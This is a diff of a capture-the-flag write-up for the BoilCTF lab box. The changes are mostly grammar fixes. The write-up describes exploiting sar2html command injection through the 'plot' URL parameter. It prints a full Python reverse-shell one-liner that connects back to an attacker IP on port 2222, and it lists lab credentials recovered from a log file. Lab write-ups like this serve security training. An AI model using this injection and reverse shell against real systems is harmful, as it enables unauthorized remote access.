0xt1m/ctf/BoilCTF/report.md

 tinymce/
 ```

-After some time, I realized that I need another tactic.
+:bulb: After some time, I realized that I needed another tactic.
 I remembered that there was some weird thing on the _\_test_ page.
 So I went there.
 ![sar2html](./imgs/sar2html.png)
 Then I googled sar2html exploit and found what I needed.
 It turns out that to exploit the thing we just need to change the url a little bit.<br>
-This is a good url which supposed to give us something whatever.<br>
+This is a good URL which supposed to give us something whatever.<br>
 http://boilctf.thm/joomla/_test/index.php?plot=LINUX<br>
 But if we change it to:
 http://boilctf.thm/joomla/_test/index.php?plot=;whoami and click on the Select Host button<br>
-we get some additional result there, which is a response to our command:
+we get some additional results there, which is a response to our command:
 ![whoami](./imgs/whoami.png)

-I set up an _nc_ listener on port *2222* and used a simple python reverse-shell which I found on the internet.
-Therefore, eventually my url looked like this:<br>
+I set up an _nc_ listener on port *2222* and used a simple Python reverse-shell which I found on the internet.
+Therefore, eventually, my URL looked like this:<br>
 ```
 http://boilctf.thm/joomla/_test/index.php?plot=;python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.2.116.12",2222));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
 ```

-And at this point we got a reverse-shell.
+And at this point, we got a reverse-shell.
 Here is the contents of the _log.txt_ file that was in the folder.
 ![log.txt](./imgs/log.txt.png)
-So we got usernames and password there.
+So we got usernames and passwords there.
 username: _basterd_<br>
 username: _pentest_<br>
 password: _superduperp@$$_<br>